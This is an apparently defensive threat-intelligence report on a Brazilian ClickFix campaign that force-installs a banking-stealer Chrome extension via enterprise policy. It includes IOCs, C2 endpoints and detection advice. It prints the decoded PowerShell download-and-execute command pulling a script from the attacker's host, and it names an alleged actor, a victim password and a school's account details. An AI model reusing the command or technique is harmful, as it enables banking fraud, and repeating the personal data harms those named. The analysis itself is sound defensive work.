59 Victims, Zero Authentication: A ClickFix Campaign Force-Installs a Chrome Extension Banking Stealer and Leaves the Entire C2 Wide Open

PublishedApril 10, 2026

clickfixbanking-stealerchrome-extensionbrazilpix-fraudc2-infrastructureunauthenticated

Published: April 10, 2026 Author: GHOST — Breakglass Intelligence TLP: CLEAR Tags: ClickFix, Brazilian Banking Trojan, Chrome Extension Abuse, Credential Theft, Pix Fraud, C2 Infrastructure

Executive Summary

A community tip from @HuntYethHounds on X — replying to our earlier Grandoreiro ClickFix report — led GHOST to a fully exposed Brazilian banking fraud operation running on a hijacked subdomain of a legitimate Bangladeshi web developer's domain. The operator left every endpoint of the command-and-control server unauthenticated: the admin panel, live victim screenshots, stolen credentials, intercepted banking requests, and real-time WebSocket control channels were all accessible without a single authentication check.

The operation combines ClickFix social engineering with a force-installed Chrome extension that has zero antivirus detections (0/38) and targets eight Brazilian financial institutions. At the time of investigation, 59 machines were compromised, seven were online, and the C2 contained live screenshots of banking sessions, stolen passwords in cleartext, and intercepted Pix payment data — including what appears to be a school fund account belonging to a real Brazilian educational institution.

The actor behind the phishing infrastructure is identified by name via WHOIS: ANTONIO EDUARDO FREDERICO, registered with a Brazilian CPF and a Gmail address. This is one of six critical OPSEC failures that fully expose the operation.

Origin of the Tip
Infrastructure Overview
Kill Chain Analysis
The Chrome Extension: BCB v4.0.11
PowerShell Payload
The C2: Complete API Mapping
Victim Telemetry
Phishing Panel: Banco do Brasil Clone
Targeted Financial Institutions
Attribution
OPSEC Failures
Timeline
Detection Status
MITRE ATT&CK Mapping
What This Report Adds to the Public Record
Indicators of Compromise
Recommendations

Origin of the Tip

On April 10, 2026, @HuntYethHounds replied to our earlier report on Grandoreiro campaigns leveraging ClickFix social engineering, flagging test1[.]amanur[.]com as hosting a Portuguese-language ClickFix lure. GHOST pivoted on the domain and within hours had mapped the full infrastructure, extracted the Chrome extension, decoded the PowerShell installer, enumerated all 59 victims, and identified the actor by name.

Credit to @HuntYethHounds for the initial observation that made this investigation possible.

Infrastructure Overview

The operation spans three domains and a single primary VPS, with extension hosting and WebSocket relay on separate Hostinger infrastructure behind Cloudflare.

Primary C2 Server

Attribute	Value
Domain	`test1[.]amanur[.]com`
IP	`144[.]126[.]140[.]33`
Hosting	Contabo VPS, St. Louis, MO
OS	Windows Server

Exposed services on 144[.]126[.]140[.]33:

Port	Service	Function
80/443	Apache 2.4.58 (Win64)	ClickFix landing pages
3000	Uvicorn (Python)	Main C2 API — fully unauthenticated
5000	Werkzeug (Python)	Banco do Brasil phishing clone + "Painel BB Control" admin
3306	MariaDB	Database — exposed to internet
3389	RDP	Remote Desktop — exposed to internet
5985	WinRM	Windows Remote Management — exposed to internet

Supporting Infrastructure

Domain	Purpose	Hosting
`xpie348[.]online`	Chrome extension hosting and distribution	Hostinger, behind Cloudflare
`certificadosuporte[.]com[.]br`	WebSocket C2 relay for phishing panel	Hostinger
`protocolovirtual[.]org`	Additional ClickFix lure domain	Same IP: `144[.]126[.]140[.]33`

The Hijacked Domain

amanur[.]com is the legitimate personal domain of Amanur Rahman, a Bangladeshi web developer. Only the test1 subdomain resolves to the malicious IP — all other subdomains and the root domain point to legitimate infrastructure. Rahman is assessed with high confidence to be a victim of subdomain hijacking, not a participant in the operation.

Kill Chain Analysis

The infection chain is a textbook ClickFix delivery combined with an unusual persistence mechanism: force-installing a Chrome extension via enterprise policy using Chrome Cloud Management enrollment tokens.

The victim lands on test1[.]amanur[.]com or protocolovirtual[.]org and is presented with a fake reCAPTCHA verification page rendered entirely in Portuguese:

"Verificando..." (Verifying...)
"Nao sou um robo" (I'm not a robot)

The page mimics Google's reCAPTCHA UI. When the victim clicks the fake checkbox, a PowerShell command is silently copied to the clipboard.

Stage 2: User-Assisted Execution

The lure instructs the victim to execute the clipboard contents:

Press Win+R to open Run dialog
Press Ctrl+V to paste the PowerShell command
Press Ctrl+Shift+Enter to run as Administrator

This bypasses browser-based download protections entirely. The victim is the execution vector.

Stage 3: Chrome Extension Force-Install

The PowerShell payload (detailed below) enrolls the victim's Chrome browser into a Chrome Cloud Management domain using a hardcoded enrollment token, then sets enterprise policy registry keys to force-install the malicious "BCB" extension. The extension installs silently, without user interaction, and cannot be removed through Chrome's normal extension management.

Stage 4: Banking Session Interception

Once installed, the BCB extension:

Intercepts all HTTP/HTTPS traffic to targeted banking domains
Captures cookies, session tokens, and passwords in real-time
Takes screenshots of the victim's screen every few seconds
Forwards everything to the C2 via the extension's background service worker

Stage 5: Operator-Controlled Fraud

The operator monitors victims in real-time via WebSocket and the C2 admin panel. Capabilities include:

Screen locking: Overlay that blocks victim interaction while the operator works
Balance manipulation: Injecting fake account balances to hide ongoing theft
QR code injection: Replacing legitimate Pix QR codes with attacker-controlled ones
Token capture: Stealing 2FA tokens and session cookies in transit
Password theft: Intercepting banking login credentials in cleartext

Stage 6: Banco do Brasil Session Hijacking

A dedicated phishing panel on port 5000 clones the Banco do Brasil PJ (business banking) interface. Stolen sessions and credentials are replayed here, with the "Painel BB Control" admin interface giving the operator a dashboard for managing active session hijacks.

The Chrome Extension: BCB v4.0.11

Attribute	Value
Extension ID	`ooidffpmpnebkcjneofkaidbcafefiag`
Name	BCB (Banco Central do Brasil)
Version	4.0.11
Manifest	V3
CRX SHA256	`401c125517b1f845289bf0a7a33e5db0391034f631eab85dd65b76b7fec9a959`
AV Detections	0/38
Update URL	`hxxp://xpie348[.]online/instalador/update.xml`
Enrollment Token	`b5ccdac1-a263-4592-9d25-8bca765403f7`

The extension masquerades as a tool from Brazil's Central Bank (Banco Central do Brasil, abbreviated BCB). It uses Manifest V3, which is significant — V3 extensions are supposed to have reduced capabilities compared to V2, yet the operator has implemented a fully functional credential stealer within the V3 constraints.

Key capabilities observed in the extension code:

webRequest interception: Hooks into all requests to targeted banking domains, capturing headers (including session cookies and authorization tokens) before they reach the server
Screenshot capture: Uses chrome.tabs.captureVisibleTab() on a timer, sending Base64-encoded screenshots to the C2 every few seconds
WebSocket communication: Maintains a persistent connection to the C2 for real-time operator control
DOM injection: Can inject overlays, fake QR codes, and modified balance displays into live banking pages
Clipboard access: Can read and modify clipboard contents (used in Pix code substitution)

The extension communicates with the C2 at 144[.]126[.]140[.]33:3000 over cleartext HTTP — no TLS, no obfuscation, no domain fronting. The C2 IP is hardcoded directly into the extension source.

PowerShell Payload

The decoded PowerShell copied to the victim's clipboard performs the following operations:

# 1. Download the Chrome extension installer script
Invoke-WebRequest -Uri "hxxp://xpie348[.]online/instalador/get_token.ps1" -OutFile "$env:TEMP\get_token.ps1"

# 2. Execute the installer
& "$env:TEMP\get_token.ps1"

The downloaded get_token.ps1 (SHA256: b68eefb10e2c304681532bc0c812c7905888e6b8e47448f1e4bc1edfe7ac193d) performs:

Chrome Cloud Management Enrollment: Writes the enrollment token b5ccdac1-a263-4592-9d25-8bca765403f7 to the Windows registry, enrolling the victim's Chrome into an attacker-controlled management domain. This is an abuse of Chrome's legitimate enterprise management feature — designed for corporate IT to manage browser policies across an organization.
Enterprise Policy Registry Keys: Sets ExtensionInstallForcelist registry keys under HKLM\SOFTWARE\Policies\Google\Chrome\ to force-install the BCB extension from hxxp://xpie348[.]online/instalador/update.xml. Because the extension is installed via enterprise policy, the victim cannot remove it through Chrome's extension manager — the "Remove" button is grayed out, and Chrome displays "Installed by your administrator."
Persistence: The enrollment and force-install policy survive browser restarts and updates. The extension auto-updates from the attacker's server.

This technique is notable because it weaponizes Chrome's enterprise management infrastructure. The victim's browser effectively becomes "managed" by the attacker, as if it were a corporate asset under their IT department's control.

The C2: Complete API Mapping

The C2 running on port 3000 (Uvicorn/Python) is completely unauthenticated. Every endpoint responds to any request without requiring credentials, tokens, or session cookies. The operator even left the OpenAPI specification endpoint enabled.

Documented Endpoints

Endpoint	Method	Function
`/admin`	GET	Admin panel UI — full dashboard
`/api/users`	GET	List all 59 victims with UUIDs, machine names, install dates
`/api/stats`	GET	Aggregate statistics — total victims, online count, intercepted requests
`/screen/{uid}`	GET	Live screenshot of victim's screen (Base64 PNG)
`/send/{uuid}/{bank}/lock`	POST	Lock victim's screen with overlay
`/send/{uuid}/{bank}/tokens`	GET	Retrieve stolen 2FA tokens for victim
`/send/{uuid}/{bank}/senha_conta`	GET	Retrieve stolen account passwords for victim
`/send/{uuid}/{bank}/saldo`	POST	Inject fake balance display
`/send/{uuid}/{bank}/qrcode`	POST	Inject fake Pix QR code
`/broadcast/block`	POST	Lock ALL victim screens simultaneously
`/create-user`	POST	Register new victim in C2
`/clients`	GET	List currently connected WebSocket clients
`/openapi.json`	GET	Full OpenAPI/Swagger specification of the C2 API

The presence of /openapi.json is remarkable — the operator built the C2 using FastAPI (a Python web framework that auto-generates OpenAPI docs) and left the documentation endpoint enabled in production. This gave GHOST a complete, machine-readable specification of every API endpoint, parameter, and response schema without any reverse engineering.

WebSocket Channels

The C2 also operates real-time WebSocket channels for:

Victim heartbeat and status updates
Live screenshot streaming
Operator command dispatch (lock, inject, capture)
Credential and token relay

Victim Telemetry

At the time of investigation, the /api/users endpoint returned data on 59 compromised machines, with 7 actively online.

Aggregate Statistics

Metric	Value
Total compromised machines	59
Online at time of investigation	7
First observed infection	April 7, 2026
Days active at time of investigation	3
Average infection rate	~20 machines/day

Case Study: Victim 0632a84a

One victim, identified by UUID 0632a84a, demonstrated the full impact of the operation:

8,616 total intercepted HTTP requests captured by the extension
27 filtered banking requests specifically targeting Banco do Brasil endpoints
Stolen password visible in cleartext via the /send/{uuid}/bb/senha_conta endpoint: 75863216
Live screenshots showed the victim actively using Banco do Brasil's online banking interface

Real Victim Data in Phishing Panel

The Banco do Brasil phishing clone on port 5000 contained hardcoded data from an active session hijack:

Field	Value
Account holder	CAIXA ESCOLAR DOUTOR JUSCELINO K. DE OLIVEIRA
Account type	School fund (Caixa Escolar)
Account number	152-X
Branch	25416-9
Greeting name	ROSARIA

"Caixa Escolar" is a type of Brazilian school fund — a financial account managed by public schools for receiving and disbursing educational funds. The operator was actively targeting a school's financial account. The greeting name "ROSARIA" likely corresponds to the school fund administrator or treasurer.

Phishing Panel: Banco do Brasil Clone

Port 5000 runs a Werkzeug (Flask) application serving two functions:

Banco do Brasil PJ Clone: A pixel-perfect replica of Banco do Brasil's business banking (Pessoa Juridica) login and dashboard. This is used to replay stolen sessions — the operator logs in using captured cookies and tokens, then interacts with the real banking backend through the cloned interface.
Painel BB Control: An admin dashboard for managing active session hijacks. This panel shows:
- Active stolen sessions with account holder names
- Real-time balance information
- Transaction history pulled from stolen sessions
- Controls for initiating Pix transfers using stolen credentials

The separation of the phishing panel (port 5000) from the main C2 (port 3000) suggests modular design — the operator may use different panels for different banks or swap them out as needed.

Targeted Financial Institutions

The BCB extension's webRequest filters and content scripts target eight Brazilian financial institutions:

Institution	Targeted Domain(s)	Type
Caixa Economica Federal	`gerenciador.caixa.gov.br`	Federal savings bank
Banco do Brasil	`*.bb.com.br`	Federal bank
BANPARA	`*.banpara.b.br`	Para state bank
Banco da Amazonia	`*.bancoamazonia.com.br`	Regional development bank
Sicredi	`*.sicredi.com.br`	Credit union cooperative
Via Credi	`*.viacredi.coop.br`	Credit cooperative
Global Getnet	`*.getnet.com.br`	Payment processor
Conta Azul	`*.contaazul.com`	Business accounting platform

The targeting is heavily weighted toward Northern Brazilian regional banks (BANPARA, Banco da Amazonia) and cooperative financial institutions (Sicredi, Via Credi), alongside the two largest federal banks. The inclusion of Conta Azul (a business accounting SaaS) and Getnet (a payment processor) suggests the operator is also interested in corporate financial data beyond traditional consumer banking.

Attribution

Named Actor

WHOIS registration for certificadosuporte[.]com[.]br (the WebSocket C2 relay domain) reveals:

Field	Value
Registrant	ANTONIO EDUARDO FREDERICO
CPF	*.023.548-
Email	ventonortemaria@gmail[.]com
Domain	certificadosuporte[.]com[.]br

The CPF (Cadastro de Pessoas Fisicas) is Brazil's individual taxpayer identification number, confirming the registrant is a Brazilian national.

Supporting Attribution Indicators

Language: All ClickFix lure text is in Portuguese. Code comments throughout the C2 and extension are in Portuguese.
Targeting: Exclusively Brazilian financial institutions, with emphasis on Northern Brazilian regional banks.
Domain TLD: .com.br (Brazilian country-code TLD) used for C2 relay infrastructure.
Pix targeting: Pix is Brazil's instant payment system operated by the Central Bank of Brazil, used exclusively within Brazil.
Extension name: "BCB" (Banco Central do Brasil) — the abbreviation of Brazil's central bank.

Hijacked Domain Owner

Amanur Rahman, the owner of amanur[.]com, is a Bangladeshi web developer with a legitimate online presence. The root domain and all subdomains except test1 resolve to legitimate infrastructure. Rahman is assessed as a victim of subdomain hijacking — likely through a dangling DNS record or compromised hosting panel — and not a participant in the fraud operation.

OPSEC Failures

The operator made six critical operational security failures that fully exposed the operation:

1. Real Identity in WHOIS

The certificadosuporte[.]com[.]br domain was registered with the operator's real name and CPF. Brazilian .com.br registrations require a valid CPF, but privacy services and intermediaries are available and commonly used by threat actors. The operator did not use one.

2. Completely Unauthenticated C2

Every endpoint on the C2 — including the admin panel, victim list, live screenshots, stolen credentials, and broadcast lock — responds without any authentication. No API keys, no session tokens, no IP allowlisting. The OpenAPI specification is even publicly accessible, providing a machine-readable map of the entire operation.

3. Real Victim Data Hardcoded in Phishing Panel

The Banco do Brasil phishing clone contains hardcoded real victim data (account holder name, account number, branch) visible in the page source. This is not dynamically loaded — it is static HTML, meaning anyone who views the page sees real stolen banking data.

4. Cleartext C2 IP in Extension

The C2 server IP address (144[.]126[.]140[.]33) is hardcoded in cleartext in the Chrome extension source code. No domain fronting, no proxy, no obfuscation. Any analyst who unpacks the CRX can immediately identify the C2.

5. Mixed HTTP/HTTPS

The extension communicates with the C2 over cleartext HTTP, not HTTPS. Screenshots, stolen credentials, and banking tokens transit the network unencrypted. This means the stolen data is not only exposed on the C2 but also to any network observer between the victim and the server.

6. Portuguese Comments in Code

Both the C2 server code and the Chrome extension contain comments written in Portuguese, providing additional confirmation of the operator's nationality and making the code easier to analyze.

Timeline

Date	Event
May 2016	`amanur[.]com` registered by Amanur Rahman (legitimate)
2024-2025	`certificadosuporte[.]com[.]br` registered by ANTONIO EDUARDO FREDERICO
Early 2026	`xpie348[.]online` registered for extension hosting
~March 2026	`protocolovirtual[.]org` registered as additional ClickFix lure
~Early April 2026	`test1[.]amanur[.]com` subdomain pointed to `144[.]126[.]140[.]33`
April 7, 2026	First victim infection recorded in C2
April 8-9, 2026	Rapid victim accumulation — 59 machines in 3 days
April 10, 2026	@HuntYethHounds tips Breakglass Intelligence; GHOST investigation initiated
April 10, 2026	Full C2 enumeration, extension extraction, victim telemetry dump, attribution

Detection Status

Indicator	Platform	Detections
`amanur[.]com`	VirusTotal	0/94
`xpie348[.]online`	VirusTotal	7/94
`certificadosuporte[.]com[.]br`	VirusTotal	1/94
`bcb.crx` (Chrome extension)	VirusTotal	0/38
`get_token.ps1`	VirusTotal	Not submitted at time of investigation

The primary C2 domain and the Chrome extension have zero detections. The extension's 0/38 score is particularly concerning — 59 victims over three days with no AV flagging the malicious extension.

MITRE ATT&CK Mapping

Technique	ID	Application
User Execution: Malicious Link	T1204.001	ClickFix lure tricks victim into running payload
Command and Scripting Interpreter: PowerShell	T1059.001	PowerShell installs Chrome extension via enterprise policy
Browser Extensions	T1176	Malicious "BCB" extension force-installed via Chrome Cloud Management
Browser Session Hijacking	T1185	Real-time interception and replay of banking sessions
Steal Web Session Cookie	T1539	Extension captures session cookies from targeted banking domains
Input Capture: Keylogging	T1056.001	Extension captures passwords and form inputs
Screen Capture	T1113	Periodic screenshots sent to C2
Application Layer Protocol: Web Protocols	T1071.001	HTTP/WebSocket for C2 communication
Encrypted Channel	T1573	HTTPS used for some C2 relay traffic (certificadosuporte[.]com[.]br)
Acquire Infrastructure: Domains	T1583.001	Multiple domains registered for lures, hosting, relay
Acquire Infrastructure: Virtual Private Server	T1583.003	Contabo VPS as primary C2
Defacement: Internal Defacement	T1491.001	Overlay injection to lock victim screens and manipulate displayed content

What This Report Adds to the Public Record

This investigation contributes the following to the collective understanding of ClickFix-based banking fraud operations:

Complete kill chain documentation from ClickFix lure to Pix payment fraud, including the novel use of Chrome Cloud Management enrollment tokens to force-install malicious extensions via enterprise policy
Full C2 API specification extracted from the operator's own OpenAPI endpoint, providing defenders with a complete map of the command-and-control protocol
Chrome extension analysis of a Manifest V3 banking stealer with 0/38 AV detections, demonstrating that MV3's security improvements do not prevent sophisticated credential theft
Named actor attribution via WHOIS, linking the operation to a specific individual
Victim telemetry showing the real-world impact on Brazilian financial institutions and a school fund account
Infrastructure mapping across three domains and multiple hosting providers, with full port/service enumeration

We maintain a standing offer to credit prior work. If any researcher or organization has previously documented this infrastructure or actor, we will update this report with appropriate attribution.

Indicators of Compromise

Domains

test1[.]amanur[.]com
xpie348[.]online
certificadosuporte[.]com[.]br
protocolovirtual[.]org

IP Addresses

144[.]126[.]140[.]33 (Contabo, St. Louis MO — primary C2)

Hashes (SHA256)

401c125517b1f845289bf0a7a33e5db0391034f631eab85dd65b76b7fec9a959 (bcb.crx — Chrome extension)
b68eefb10e2c304681532bc0c812c7905888e6b8e47448f1e4bc1edfe7ac193d (get_token.ps1 — PowerShell installer)

Chrome Extension

Extension ID: ooidffpmpnebkcjneofkaidbcafefiag
Name: BCB (Banco Central do Brasil)
Version: 4.0.11
Manifest: V3
Chrome Cloud Management Enrollment Token: b5ccdac1-a263-4592-9d25-8bca765403f7
Update URL: hxxp://xpie348[.]online/instalador/update.xml

URLs

hxxp://test1[.]amanur[.]com (ClickFix lure)
hxxp://protocolovirtual[.]org (ClickFix lure)
hxxp://xpie348[.]online/instalador/update.xml (extension update manifest)
hxxp://xpie348[.]online/instalador/get_token.ps1 (PowerShell installer)
hxxp://144[.]126[.]140[.]33:3000/admin (C2 admin panel)
hxxp://144[.]126[.]140[.]33:3000/api/users (victim enumeration)
hxxp://144[.]126[.]140[.]33:3000/openapi.json (API specification)
hxxp://144[.]126[.]140[.]33:5000 (Banco do Brasil phishing clone)
wss://certificadosuporte[.]com[.]br (WebSocket C2 relay)

Email Addresses

ventonortemaria@gmail[.]com (domain registrant)

WHOIS Attribution

Registrant: ANTONIO EDUARDO FREDERICO
CPF: ***.023.548-**
Domain: certificadosuporte[.]com[.]br

Recommendations

For defenders at targeted financial institutions:

Block the IOCs listed above at network perimeter and endpoint
Monitor for Chrome enterprise policy modifications via PowerShell, specifically ExtensionInstallForcelist registry writes under HKLM\SOFTWARE\Policies\Google\Chrome\
Alert on Chrome Cloud Management enrollment from non-corporate endpoints
Review Chrome extension installs for ID ooidffpmpnebkcjneofkaidbcafefiag

For Chrome/Google:

The Chrome Cloud Management enrollment token b5ccdac1-a263-4592-9d25-8bca765403f7 should be revoked
The extension ID ooidffpmpnebkcjneofkaidbcafefiag should be blocked

For hosting providers:

Contabo: 144[.]126[.]140[.]33 is hosting an active fraud operation with exposed RDP, WinRM, and MariaDB
Hostinger: xpie348[.]online and certificadosuporte[.]com[.]br are serving malware and C2 relay respectively

For Amanur Rahman (domain owner):

Audit DNS records for amanur[.]com and remove the test1 subdomain pointing to 144[.]126[.]140[.]33
Review hosting panel access logs for unauthorized modifications

This investigation was triggered by a community tip. Threat intelligence works best as a collective effort. If you observe related infrastructure or have additional context on this actor, reach out via reply or DM on X.

GHOST — Breakglass Intelligence April 10, 2026